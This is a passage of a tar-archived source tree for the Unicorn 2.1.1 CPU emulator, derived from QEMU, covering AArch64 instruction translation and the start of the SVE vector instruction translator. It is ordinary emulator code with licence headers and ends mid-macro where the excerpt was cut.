(!dc_isar_feature(aa64_sve, s) || !disas_sve(s, insn)) { unallocated_encoding(s); } break; case 0x8: case 0x9: /* Data processing - immediate */ disas_data_proc_imm(s, insn); break; case 0xa: case 0xb: /* Branch, exception generation and system insns */ disas_b_exc_sys(s, insn); break; case 0x4: case 0x6: case 0xc: case 0xe: /* Loads and stores */ disas_ldst(s, insn); break; case 0x5: case 0xd: /* Data processing - register */ disas_data_proc_reg(s, insn); break; case 0x7: case 0xf: /* Data processing - SIMD and floating point */ disas_data_proc_simd_fp(s, insn); break; default: assert(FALSE); /* all 15 cases should be handled above */ break; } /* if we allocated any temporaries, free them here */ free_tmp_a64(s); /* * After execution of most insns, btype is reset to 0. * Note that we set btype == -1 when the insn sets btype. */ if (s->btype > 0 && s->base.is_jmp != DISAS_NORETURN) { reset_btype(s); } } static void aarch64_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = cpu->uc; CPUARMState *env = cpu->env_ptr; ARMCPU *arm_cpu = env_archcpu(env); uint32_t tb_flags = dc->base.tb->flags; int bound, core_mmu_idx; // unicorn handle dc->uc = uc; dc->isar = &arm_cpu->isar; dc->condjmp = 0; dc->aarch64 = 1; /* If we are coming from secure EL0 in a system with a 32-bit EL3, then * there is no secure EL1, so we route exceptions to EL3. */ dc->secure_routed_to_el3 = arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3); dc->thumb = 0; dc->sctlr_b = 0; dc->be_data = FIELD_EX32(tb_flags, TBFLAG_ANY, BE_DATA) ? MO_BE : MO_LE; dc->condexec_mask = 0; dc->condexec_cond = 0; core_mmu_idx = FIELD_EX32(tb_flags, TBFLAG_ANY, MMUIDX); dc->mmu_idx = core_to_aa64_mmu_idx(core_mmu_idx); dc->tbii = FIELD_EX32(tb_flags, TBFLAG_A64, TBII); dc->tbid = FIELD_EX32(tb_flags, TBFLAG_A64, TBID); dc->current_el = arm_mmu_idx_to_el(dc->mmu_idx); dc->user = (dc->current_el == 0); dc->fp_excp_el = FIELD_EX32(tb_flags, TBFLAG_ANY, FPEXC_EL); dc->sve_excp_el = FIELD_EX32(tb_flags, TBFLAG_A64, SVEEXC_EL); dc->sve_len = (FIELD_EX32(tb_flags, TBFLAG_A64, ZCR_LEN) + 1) * 16; dc->pauth_active = FIELD_EX32(tb_flags, TBFLAG_A64, PAUTH_ACTIVE); dc->bt = FIELD_EX32(tb_flags, TBFLAG_A64, BT); dc->btype = FIELD_EX32(tb_flags, TBFLAG_A64, BTYPE); dc->unpriv = FIELD_EX32(tb_flags, TBFLAG_A64, UNPRIV); dc->vec_len = 0; dc->vec_stride = 0; dc->cp_regs = arm_cpu->cp_regs; dc->features = env->features; /* Single step state. The code-generation logic here is: * SS_ACTIVE == 0: * generate code with no special handling for single-stepping (except * that anything that can make us go to SS_ACTIVE == 1 must end the TB; * this happens anyway because those changes are all system register or * PSTATE writes). * SS_ACTIVE == 1, PSTATE.SS == 1: (active-not-pending) * emit code for one insn * emit code to clear PSTATE.SS * emit code to generate software step exception for completed step * end TB (as usual for having generated an exception) * SS_ACTIVE == 1, PSTATE.SS == 0: (active-pending) * emit code to generate a software step exception * end the TB */ dc->ss_active = FIELD_EX32(tb_flags, TBFLAG_ANY, SS_ACTIVE); dc->pstate_ss = FIELD_EX32(tb_flags, TBFLAG_ANY, PSTATE_SS); dc->is_ldex = false; dc->debug_target_el = FIELD_EX32(tb_flags, TBFLAG_ANY, DEBUG_TARGET_EL); /* Bound the number of insns to execute to those left on the page. */ #ifdef _MSC_VER bound = (0 - (dc->base.pc_first | TARGET_PAGE_MASK)) / 4; #else bound = -(dc->base.pc_first | TARGET_PAGE_MASK) / 4; #endif /* If architectural single step active, limit to 1. */ if (dc->ss_active) { bound = 1; } dc->base.max_insns = MIN(dc->base.max_insns, bound); init_tmp_a64_array(dc); } static void aarch64_tr_tb_start(DisasContextBase *db, CPUState *cpu) { } static void aarch64_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, 0, 0); dc->insn_start = tcg_last_op(tcg_ctx); } static bool aarch64_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cpu, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (bp->flags & BP_CPU) { gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); gen_helper_check_breakpoints(tcg_ctx, tcg_ctx->cpu_env); /* End the TB early; it likely won't be executed */ dc->base.is_jmp = DISAS_TOO_MANY; } else { gen_exception_internal_insn(dc, dc->base.pc_next, EXCP_DEBUG); /* The address covered by the breakpoint must be included in [tb->pc, tb->pc + tb->size) in order to for it to be properly cleared -- thus we increment the PC here so that the logic setting tb->size below does the right thing. */ dc->base.pc_next += 4; dc->base.is_jmp = DISAS_NORETURN; } return true; } static void aarch64_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); CPUARMState *env = cpu->env_ptr; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(dc->uc, dcbase->pc_next)) { // imitate WFI instruction to halt emulation dcbase->is_jmp = DISAS_WFI; } else { if (dc->ss_active && !dc->pstate_ss) { /* Singlestep state is Active-pending. * If we're in this state at the start of a TB then either * a) we just took an exception to an EL which is being debugged * and this is the first insn in the exception handler * b) debug exceptions were masked and we just unmasked them * without changing EL (eg by clearing PSTATE.D) * In either case we're going to take a swstep exception in the * "did not step an insn" case, and so the syndrome ISV and EX * bits should be zero. */ assert(dc->base.num_insns == 1); gen_swstep_exception(dc, 0, 0); dc->base.is_jmp = DISAS_NORETURN; } else { disas_a64_insn(env, dc); } translator_loop_temp_check(&dc->base); } } static void aarch64_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (unlikely(dc->base.singlestep_enabled || dc->ss_active)) { /* Note that this means single stepping WFI doesn't halt the CPU. * For conditional branch insns this is harmless unreachable code as * gen_goto_tb() has already handled emitting the debug exception * (and thus a tb-jump is not possible when singlestepping). */ switch (dc->base.is_jmp) { default: gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); /* fall through */ case DISAS_EXIT: case DISAS_JUMP: if (dc->base.singlestep_enabled) { gen_exception_internal(tcg_ctx, EXCP_DEBUG); } else { gen_step_complete_exception(dc); } break; case DISAS_NORETURN: break; } } else { switch (dc->base.is_jmp) { case DISAS_NEXT: case DISAS_TOO_MANY: gen_goto_tb(dc, 1, dc->base.pc_next); break; default: case DISAS_UPDATE: gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); /* fall through */ case DISAS_EXIT: tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; case DISAS_JUMP: tcg_gen_lookup_and_goto_ptr(tcg_ctx); break; case DISAS_NORETURN: case DISAS_SWI: break; case DISAS_WFE: gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); gen_helper_wfe(tcg_ctx, tcg_ctx->cpu_env); break; case DISAS_YIELD: gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); gen_helper_yield(tcg_ctx, tcg_ctx->cpu_env); break; case DISAS_WFI: { /* This is a special case because we don't want to just halt the CPU * if trying to debug across a WFI. */ TCGv_i32 tmp = tcg_const_i32(tcg_ctx, 4); gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); gen_helper_wfi(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); /* The helper doesn't necessarily throw an exception, but we * must go back to the main loop to check for interrupts anyway. */ tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; } } } } const TranslatorOps aarch64_translator_ops = { .init_disas_context = aarch64_tr_init_disas_context, .tb_start = aarch64_tr_tb_start, .insn_start = aarch64_tr_insn_start, .breakpoint_check = aarch64_tr_breakpoint_check, .translate_insn = aarch64_tr_translate_insn, .tb_stop = aarch64_tr_tb_stop, }; ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/translate-a64.h�������������������������������������������������������0000664�0000000�0000000�00000012156�14675241067�0020763�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * AArch64 translation, common definitions. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef TARGET_ARM_TRANSLATE_A64_H #define TARGET_ARM_TRANSLATE_A64_H void unallocated_encoding(DisasContext *s); typedef struct TCGContext TCGContext; #define unsupported_encoding(s, insn) \ do { \ qemu_log_mask(LOG_UNIMP, \ "%s:%d: unsupported instruction encoding 0x%08x " \ "at pc=%016" PRIx64 "\n", \ __FILE__, __LINE__, insn, s->pc_curr); \ unallocated_encoding(s); \ } while (0) TCGv_i64 new_tmp_a64(DisasContext *s); TCGv_i64 new_tmp_a64_zero(DisasContext *s); TCGv_i64 cpu_reg(DisasContext *s, int reg); TCGv_i64 cpu_reg_sp(DisasContext *s, int reg); TCGv_i64 read_cpu_reg(DisasContext *s, int reg, int sf); TCGv_i64 read_cpu_reg_sp(DisasContext *s, int reg, int sf); void write_fp_dreg(DisasContext *s, int reg, TCGv_i64 v); TCGv_ptr get_fpstatus_ptr(TCGContext *tcg_ctx, bool); bool logic_imm_decode_wmask(uint64_t *result, unsigned int immn, unsigned int imms, unsigned int immr); bool sve_access_check(DisasContext *s); /* We should have at some point before trying to access an FP register * done the necessary access check, so assert that * (a) we did the check and * (b) we didn't then just plough ahead anyway if it failed. * Print the instruction pattern in the abort message so we can figure * out what we need to fix if a user encounters this problem in the wild. */ static inline void assert_fp_access_checked(DisasContext *s) { #ifdef CONFIG_DEBUG_TCG if (unlikely(!s->fp_access_checked || s->fp_excp_el)) { fprintf(stderr, "target-arm: FP access check missing for " "instruction 0x%08x\n", s->insn); abort(); } #endif } /* Return the offset into CPUARMState of an element of specified * size, 'element' places in from the least significant end of * the FP/vector register Qn. */ static inline int vec_reg_offset(DisasContext *s, int regno, int element, MemOp size) { int element_size = 1 << size; int offs = element * element_size; #ifdef HOST_WORDS_BIGENDIAN /* This is complicated slightly because vfp.zregs[n].d[0] is * still the lowest and vfp.zregs[n].d[15] the highest of the * 256 byte vector, even on big endian systems. * * Calculate the offset assuming fully little-endian, * then XOR to account for the order of the 8-byte units. * * For 16 byte elements, the two 8 byte halves will not form a * host int128 if the host is bigendian, since they're in the * wrong order. However the only 16 byte operation we have is * a move, so we can ignore this for the moment. More complicated * operations will have to special case loading and storing from * the zregs array. */ if (element_size < 8) { offs ^= 8 - element_size; } #endif offs += offsetof(CPUARMState, vfp.zregs[regno]); assert_fp_access_checked(s); return offs; } /* Return the offset info CPUARMState of the "whole" vector register Qn. */ static inline int vec_full_reg_offset(DisasContext *s, int regno) { assert_fp_access_checked(s); return offsetof(CPUARMState, vfp.zregs[regno]); } /* Return a newly allocated pointer to the vector register. */ static inline TCGv_ptr vec_full_reg_ptr(DisasContext *s, int regno) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr ret = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, ret, tcg_ctx->cpu_env, vec_full_reg_offset(s, regno)); return ret; } /* Return the byte size of the "whole" vector register, VL / 8. */ static inline int vec_full_reg_size(DisasContext *s) { return s->sve_len; } bool disas_sve(DisasContext *, uint32_t); /* Note that the gvec expanders operate on offsets + sizes. */ typedef void GVecGen2Fn(TCGContext *, unsigned, uint32_t, uint32_t, uint32_t, uint32_t); typedef void GVecGen2iFn(TCGContext *, unsigned, uint32_t, uint32_t, int64_t, uint32_t, uint32_t); typedef void GVecGen3Fn(TCGContext *, unsigned, uint32_t, uint32_t, uint32_t, uint32_t, uint32_t); typedef void GVecGen4Fn(TCGContext *, unsigned, uint32_t, uint32_t, uint32_t, uint32_t, uint32_t, uint32_t); #endif /* TARGET_ARM_TRANSLATE_A64_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/translate-sve.c�������������������������������������������������������0000664�0000000�0000000�00000524007�14675241067�0021164�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * AArch64 SVE translation * * Copyright (c) 2018 Linaro, Ltd * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "tcg/tcg-op-gvec.h" #include "tcg/tcg-gvec-desc.h" #include "qemu/log.h" #include "arm_ldst.h" #include "translate.h" #include "internals.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "translate-a64.h" #include "fpu/softfloat.h" typedef void GVecGen2sFn(TCGContext *, unsigned, uint32_t, uint32_t, TCGv_i64, uint32_t, uint32_t); typedef void gen_helper_gvec_flags_3(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); typedef void gen_helper_gvec_flags_4(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); typedef void gen_helper_gvec_mem(TCGContext *, TCGv_env, TCGv_ptr, TCGv_i64, TCGv_i32); typedef void gen_helper_gvec_mem_scatter(TCGContext *, TCGv_env, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i64, TCGv_i32); /* * Helpers for extracting complex instruction fields. */ /* See e.g. ASR (immediate, predicated). * Returns -1 for unallocated encoding; diagnose later. */ static int tszimm_esz(DisasContext *s, int x) { x >>= 3; /* discard imm3 */ return 31 - clz32(x); } static int tszimm_shr(DisasContext *s, int x) { return (16 << tszimm_esz(s, x)) - x; } /* See e.g. LSL (immediate, predicated). */ static int tszimm_shl(DisasContext *s, int x) { return x - (8 << tszimm_esz(s, x)); } static inline int plus1(DisasContext *s, int x) { return x + 1; } /* The SH bit is in bit 8. Extract the low 8 and shift. */ static inline int expand_imm_sh8s(DisasContext *s, int x) { return (int8_t)x << (x & 0x100 ? 8 : 0); } static inline int expand_imm_sh8u(DisasContext *s, int x) { return (uint8_t)x << (x & 0x100 ? 8 : 0); } /* Convert a 2-bit memory size (msz) to a 4-bit data type (dtype) * with unsigned data. C.f. SVE Memory Contiguous Load Group. */ static inline int msz_dtype(DisasContext *s, int msz) { static const uint8_t dtype[4] = { 0, 5, 10, 15 }; return dtype[msz]; } /* * Include the generated decoder. */ #include "decode-sve.inc.c" /* * Implement all of the translator functions referenced by the decoder. */ /* Return the offset info CPUARMState of the predicate vector register Pn. * Note for this purpose, FFR is P16. */ static inline int pred_full_reg_offset(DisasContext *s, int regno) { return offsetof(CPUARMState, vfp.pregs[regno]); } /* Return the byte size of the whole predicate register, VL / 64. */ static inline int pred_full_reg_size(DisasContext *s) { return s->sve_len >> 3; } /* Round up the size of a register to a size allowed by * the tcg vector infrastructure. Any operation which uses this * size may assume that the bits above pred_full_reg_size are zero, * and must leave them the same way. * * Note that this is not needed for the vector registers as they * are always properly sized for tcg vectors. */ static int size_for_gvec(int size) { if (size <= 8) { return 8; } else { return QEMU_ALIGN_UP(size, 16); } } static int pred_gvec_reg_size(DisasContext *s) { return size_for_gvec(pred_full_reg_size(s)); } /* Invoke a vector expander on two Zregs. */ static bool do_vector2_z(DisasContext *s, GVecGen2Fn *gvec_fn, int esz, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); gvec_fn(tcg_ctx, esz, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vsz, vsz); } return true; } /* Invoke a vector expander on three Zregs. */ static bool do_vector3_z(DisasContext *s, GVecGen3Fn *gvec_fn, int esz, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); gvec_fn(tcg_ctx, esz, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), vsz, vsz); } return true; } /* Invoke a vector move on two Zregs. */ static bool do_mov_z(DisasContext *s, int rd, int rn) { return do_vector2_z(s, tcg_gen_gvec_mov, 0, rd, rn); } /* Initialize a Zreg with replications of a 64-bit immediate. */ static void do_dupi_z(DisasContext *s, int rd, uint64_t word) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_dup64i(tcg_ctx, vec_full_reg_offset(s, rd), vsz, vsz, word); } /* Invoke a vector expander on two Pregs. */ static bool do_vector2_p(DisasContext *s, GVecGen2Fn *gvec_fn, int esz, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned psz = pred_gvec_reg_size(s); gvec_fn(tcg_ctx, esz, pred_full_reg_offset(s, rd), pred_full_reg_offset(s, rn), psz, psz); } return true; } /* Invoke a vector expander on three Pregs. */ static bool do_vector3_p(DisasContext *s, GVecGen3Fn *gvec_fn, int esz, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned psz = pred_gvec_reg_size(s); gvec_fn(tcg_ctx, esz, pred_full_reg_offset(s, rd), pred_full_reg_offset(s, rn), pred_full_reg_offset(s, rm), psz, psz); } return true; } /* Invoke a vector operation on four Pregs. */ static bool do_vecop4_p(DisasContext *s, const GVecGen4 *gvec_op, int rd, int rn, int rm, int rg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned psz = pred_gvec_reg_size(s); tcg_gen_gvec_4(tcg_ctx, pred_full_reg_offset(s, rd), pred_full_reg_offset(s, rn), pred_full_reg_offset(s, rm), pred_full_reg_offset(s, rg), psz, psz, gvec_op); } return true; } /* Invoke a vector move on two Pregs. */ static bool do_mov_p(DisasContext *s, int rd, int rn) { return do_vector2_p(s, tcg_gen_gvec_mov, 0, rd, rn); } /* Set the cpu flags as per a return from an SVE helper. */ static void do_pred_flags(TCGContext *tcg_ctx, TCGv_i32 t) { tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, t); tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_ZF, t, 2); tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_CF, t, 1); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); } /* Subroutines computing the ARM PredTest psuedofunction. */ static void do_predtest1(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 g) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); gen_helper_sve_predtest1(tcg_ctx, t, d, g); do_pred_flags(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, t); } static void do_predtest(DisasContext *s, int dofs, int gofs, int words) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr dptr = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr gptr = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t; tcg_gen_addi_ptr(tcg_ctx, dptr, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, gptr, tcg_ctx->cpu_env, gofs); t = tcg_const_i32(tcg_ctx, words); gen_helper_sve_predtest(tcg_ctx, t, dptr, gptr, t); tcg_temp_free_ptr(tcg_ctx, dptr); tcg_temp_free_ptr(tcg_ctx, gptr); do_pred_flags(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, t); } /* For each element size, the bits within a predicate word that are active. */ const uint64_t pred_esz_masks[4] = { 0xffffffffffffffffull, 0x5555555555555555ull, 0x1111111111111111ull, 0x0101010101010101ull }; /* *** SVE Logical - Unpredicated Group */ static bool trans_AND_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_and, 0, a->rd, a->rn, a->rm); } static bool trans_ORR_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_or, 0, a->rd, a->rn, a->rm); } static bool trans_EOR_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_xor, 0, a->rd, a->rn, a->rm); } static bool trans_BIC_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_andc, 0, a->rd, a->rn, a->rm); } /* *** SVE Integer Arithmetic - Unpredicated Group */ static bool trans_ADD_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_add, a->esz, a->rd, a->rn, a->rm); } static bool trans_SUB_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_sub, a->esz, a->rd, a->rn, a->rm); } static bool trans_SQADD_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_ssadd, a->esz, a->rd, a->rn, a->rm); } static bool trans_SQSUB_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_sssub, a->esz, a->rd, a->rn, a->rm); } static bool trans_UQADD_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_usadd, a->esz, a->rd, a->rn, a->rm); } static bool trans_UQSUB_zzz(DisasContext *s, arg_rrr_esz *a) { return do_vector3_z(s, tcg_gen_gvec_ussub, a->esz, a->rd, a->rn, a->rm); } /* *** SVE Integer Arithmetic - Binary Predicated Group */ static bool do_zpzz_ool(DisasContext *s, arg_rprr_esz *a, gen_helper_gvec_4 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); if (fn == NULL) { return false; } if (sve_access_check(s)) { tcg_gen_gvec_4_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), vsz, vsz, 0, fn); } return true; } /* Select active elememnts from Zn and inactive elements from Zm, * storing the result in Zd. */ static void do_sel_z(DisasContext *s, int rd, int rn, int rm, int pg, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_4 * const fns[4] = { gen_helper_sve_sel_zpzz_b, gen_helper_sve_sel_zpzz_h, gen_helper_sve_sel_zpzz_s, gen_helper_sve_sel_zpzz_d }; unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_4_ool(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), pred_full_reg_offset(s, pg), vsz, vsz, 0, fns[esz]); } #define DO_ZPZZ(NAME, name) \ static bool trans_##NAME##_zpzz(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_4 * const fns[4] = { \ gen_helper_sve_##name##_zpzz_b, gen_helper_sve_##name##_zpzz_h, \ gen_helper_sve_##name##_zpzz_s, gen_helper_sve_##name##_zpzz_d, \ }; \ return do_zpzz_ool(s, a, fns[a->esz]); \ } DO_ZPZZ(AND, and) DO_ZPZZ(EOR, eor) DO_ZPZZ(ORR, orr) DO_ZPZZ(BIC, bic) DO_ZPZZ(ADD, add) DO_ZPZZ(SUB, sub) DO_ZPZZ(SMAX, smax) DO_ZPZZ(UMAX, umax) DO_ZPZZ(SMIN, smin) DO_ZPZZ(UMIN, umin) DO_ZPZZ(SABD, sabd) DO_ZPZZ(UABD, uabd) DO_ZPZZ(MUL, mul) DO_ZPZZ(SMULH, smulh) DO_ZPZZ(UMULH, umulh) DO_ZPZZ(ASR, asr) DO_ZPZZ(LSR, lsr) DO_ZPZZ(LSL, lsl) static bool trans_SDIV_zpzz(DisasContext *s, arg_rprr_esz *a) { static gen_helper_gvec_4 * const fns[4] = { NULL, NULL, gen_helper_sve_sdiv_zpzz_s, gen_helper_sve_sdiv_zpzz_d }; return do_zpzz_ool(s, a, fns[a->esz]); } static bool trans_UDIV_zpzz(DisasContext *s, arg_rprr_esz *a) { static gen_helper_gvec_4 * const fns[4] = { NULL, NULL, gen_helper_sve_udiv_zpzz_s, gen_helper_sve_udiv_zpzz_d }; return do_zpzz_ool(s, a, fns[a->esz]); } static bool trans_SEL_zpzz(DisasContext *s, arg_rprr_esz *a) { if (sve_access_check(s)) { do_sel_z(s, a->rd, a->rn, a->rm, a->pg, a->esz); } return true; } #undef DO_ZPZZ /* *** SVE Integer Arithmetic - Unary Predicated Group */ static bool do_zpz_ool(DisasContext *s, arg_rpr_esz *a, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), pred_full_reg_offset(s, a->pg), vsz, vsz, 0, fn); } return true; } #define DO_ZPZ(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rpr_esz *a) \ { \ static gen_helper_gvec_3 * const fns[4] = { \ gen_helper_sve_##name##_b, gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d, \ }; \ return do_zpz_ool(s, a, fns[a->esz]); \ } DO_ZPZ(CLS, cls) DO_ZPZ(CLZ, clz) DO_ZPZ(CNT_zpz, cnt_zpz) DO_ZPZ(CNOT, cnot) DO_ZPZ(NOT_zpz, not_zpz) DO_ZPZ(ABS, abs) DO_ZPZ(NEG, neg) static bool trans_FABS(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_fabs_h, gen_helper_sve_fabs_s, gen_helper_sve_fabs_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_FNEG(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_fneg_h, gen_helper_sve_fneg_s, gen_helper_sve_fneg_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_SXTB(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_sxtb_h, gen_helper_sve_sxtb_s, gen_helper_sve_sxtb_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_UXTB(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_uxtb_h, gen_helper_sve_uxtb_s, gen_helper_sve_uxtb_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_SXTH(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, NULL, gen_helper_sve_sxth_s, gen_helper_sve_sxth_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_UXTH(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, NULL, gen_helper_sve_uxth_s, gen_helper_sve_uxth_d }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_SXTW(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ool(s, a, a->esz == 3 ? gen_helper_sve_sxtw_d : NULL); } static bool trans_UXTW(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ool(s, a, a->esz == 3 ? gen_helper_sve_uxtw_d : NULL); } #undef DO_ZPZ /* *** SVE Integer Reduction Group */ typedef void gen_helper_gvec_reduc(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_ptr, TCGv_i32); static bool do_vpz_ool(DisasContext *s, arg_rpr_esz *a, gen_helper_gvec_reduc *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr t_zn, t_pg; TCGv_i32 desc; TCGv_i64 temp; if (fn == NULL) { return false; } if (!sve_access_check(s)) { return true; } desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); temp = tcg_temp_new_i64(tcg_ctx); t_zn = tcg_temp_new_ptr(tcg_ctx); t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); fn(tcg_ctx, temp, t_zn, t_pg, desc); tcg_temp_free_ptr(tcg_ctx, t_zn); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, desc); write_fp_dreg(s, a->rd, temp); tcg_temp_free_i64(tcg_ctx, temp); return true; } #define DO_VPZ(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rpr_esz *a) \ { \ static gen_helper_gvec_reduc * const fns[4] = { \ gen_helper_sve_##name##_b, 